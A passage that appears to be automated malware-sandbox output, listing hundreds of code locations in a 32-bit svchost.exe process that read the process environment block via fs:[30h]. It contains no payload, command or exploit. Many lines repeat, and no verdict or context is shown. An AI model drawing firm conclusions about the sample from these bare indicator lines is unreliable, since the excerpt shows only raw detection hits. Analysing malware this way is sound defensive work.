Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]	2_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]	2_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]	2_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]	2_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]	2_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
